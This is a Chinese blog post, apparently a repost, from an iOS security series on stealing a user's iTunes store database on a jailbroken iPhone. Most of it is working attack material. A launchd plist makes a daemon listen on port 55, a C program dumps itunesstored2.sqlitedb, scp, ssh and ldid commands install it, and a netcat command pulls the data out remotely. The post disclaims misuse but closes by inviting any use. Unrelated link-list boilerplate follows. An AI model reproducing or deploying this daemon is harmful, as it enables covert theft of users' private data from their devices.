ios--安全攻防02--后台daemon非法窃取用户iTunesstore信息
来源:互联网 发布:中行说 知乎 编辑:程序博客网 时间:2024/06/16 22:12
后台daemon非法窃取用户iTunesstore信息
文章出处:http://blog.csdn.net/yiyaaixuexi/article/details/18353423#comments
本人郑重声明:并不鼓励窃取用户隐私等行为,一切hack学习都只是为了研究如何防御。OK,进入正题。
开机自启动
在iOS安全攻防(一):Hack必备的命令与工具中,介绍了如何编译自己的C程序并手动启动。今天介绍如何使程序变为开机自启动。
1.首先打开Xcode创建一个plist属性文件,如下图所示:
其中要注意一下通信服务名,我定为55。用编辑器打开,即为:
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
- <plist version="1.0">
- <dict>
- <key>Program</key>
- <string>/usr/bin/ncdemo</string>
- <key>StandardErrorPath</key>
- <string>/dev/null</string>
- <key>SessionCreate</key>
- <true/>
- <key>ProgramArguments</key>
- <array>
- <string>/usr/bin/ncdemo</string>
- </array>
- <key>inetdCompatibility</key>
- <dict>
- <key>Wait</key>
- <false/>
- </dict>
- <key>Sockets</key>
- <dict>
- <key>Listeners</key>
- <dict>
- <key>SockServiceName</key>
- <string>55</string>
- </dict>
- </dict>
- </dict>
- </plist>
最后,将plist文件 scp 至 root@192.168.1.114:/System/Library/LaunchDaemons/ 下 .
编写读取iTunesstore数据库程序
读取itunesstored2.sqlitedb信息,并输出到stdout中,便于我们读取。
- #include <stdio.h>
- #include <fcntl.h>
- #include <stdlib.h>
- #define FILE "/var/mobile/Library/com.apple.itunesstored/itunesstored2.sqlitedb"
- int main(){
- int fd = open(FILE, O_RDONLY);
- char buf[128];
- int ret = 0;
- if(fd < 0)
- return -1;
- while (( ret = read(fd, buf, sizeof(buf))) > 0){
- write( fileno(stdout), buf, ret);
- }
- close(fd);
- return 0;
- }
编译、拷贝、签名
1.编译方法上篇文章已经介绍清楚,这里不再重复,直接¥%¥#%¥……%# 生成运行在ARM的 ncdemo
2.将ncdemo scp 到设备中,并登录
$ scp ncdemo root@192.168.1.114:ncdemo
$ ssh root@192.168.1.114
3.签名
#ldid -S ncdemo
#mv ncdemo /usr/bin
抓取 iTunesstore 数据信息
这时,我们只需要利用netcat,指定之前定义的服务名称,轻松在本地抓取设备 iTunesstore 信息.
$ nc 192.168.1.114 55 > itunesstored2.sqlitedb
分析 iTunesstore 数据信息
好吧,这里就介绍个最简单的应用,利用string命令查看:
$ strings itunesstored2.sqlitedb
于是乎,我们就清晰的得到了iPhone /iPad 设备上都安装了哪些app :
当然,除了这些,你想干什么都可以……夜深了,先写到这里吧……
- ios--安全攻防02--后台daemon非法窃取用户iTunesstore信息
- iOS安全攻防(二):后台daemon非法窃取用户iTunesstore信息
- iOS安全攻防(二):后台daemon非法窃取用户iTunesstore信息
- ios安全攻防(二)后台daemon非法窃取用户iTunesstore信息
- 后台daemon非法窃取用户iTunesstore信息
- 一个小例子说明ios后台daemon程序获取iTunesstore信息
- 【链接】iOS安全攻防
- iOS安全攻防
- iOS 安全攻防系列
- iOS安全攻防
- iOS之安全攻防
- iOS安全攻防-砸壳
- iOS安全攻防
- iOS安全攻防-键盘安全
- iOS 安全攻防学习规划
- CSDN iOS安全攻防专栏
- iOS安全攻防-钥匙链安全
- 网络信息安全攻防实验室 第三关
- Android资源文件夹res/raw和assets的使用
- Android JNI知识简介
- AFNetWorking GET 和POST
- Mac X 10.9 的那些事
- 启动框架 org.apache.catalina.startup(转)
- ios--安全攻防02--后台daemon非法窃取用户iTunesstore信息
- 如何忘却jQuery,开始使用JavaScript原生API
- hibernate批量删除
- 电脑主机箱前置耳机没声音(window7)
- ADO连接字符串总结
- java获取服务器一些信息的方法
- #HY000The user specified as a definer ('root'@'%') does not exist
- OpenPop读取邮件、获取附件、删除邮件等
- strcpy()函数经典实现